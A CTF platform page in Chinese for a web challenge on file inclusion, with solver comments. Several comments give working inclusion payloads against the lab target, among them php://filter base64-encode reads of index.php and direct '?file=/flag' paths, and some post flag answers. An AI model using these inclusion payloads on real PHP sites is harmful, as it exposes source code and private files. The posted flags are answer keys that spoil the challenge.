文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 11175
提  示:
描  述:
flag{}
评论
00zz 13天前

http://114.67.175.224:18171/index.php?file=////flag

回复 0

TYing 18天前

使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。

回复 0

自由魂儿儿儿 1月前

flag{782073eb4dee97623a2e558efe3eec5a}

回复 0

622独爱辉神 1月前

flag{08d4833b-b9e1-473d-8621-58a358e9014a}

回复 0

000ooo 1月前

/index.php?file=/flag

回复 0

Zhumeng 1月前

php伪协议读取index.php

回复 1
Jiafeng 1月前

我在你的评论下面补充全吧:php://filter/convert.base64-encode/resource=index.php

回复 0

Wang_Micro 2月前

flag{642c1d8cf84d01e3a2df403e83d3e43b}

回复 0

33555 2月前

/index.php?file=///flag

回复 1

Pearpeach1 2月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

hao7 3月前

flag{dff1aea3fcdd906ce70c1998addf1ccc}

回复 0

WriteUp

image
harry

2 金币

评分(10)

解题动态

maliding 攻破了该题 1小时前
Bugkutao 攻破了该题 3天前
fmjjkk 攻破了该题 3天前
18267395325 攻破了该题 4天前
派大星和海绵宝宝 攻破了该题 4天前
xjhgzm 攻破了该题 4天前
Lousix 攻破了该题 4天前
19583567350 攻破了该题 4天前
Ktcc5 攻破了该题 4天前
breeze153 攻破了该题 4天前
1997080520030530 攻破了该题 5天前
warriorlfx 攻破了该题 5天前
ZXCVBNM345678 攻破了该题 5天前
xshzgjshpy 攻破了该题 5天前
z723622533 攻破了该题 5天前
Veritas 攻破了该题 6天前
PDXX 攻破了该题 6天前
a1pin3 攻破了该题 7天前
faasfagasg 攻破了该题 7天前
Flce 攻破了该题 7天前
问题反馈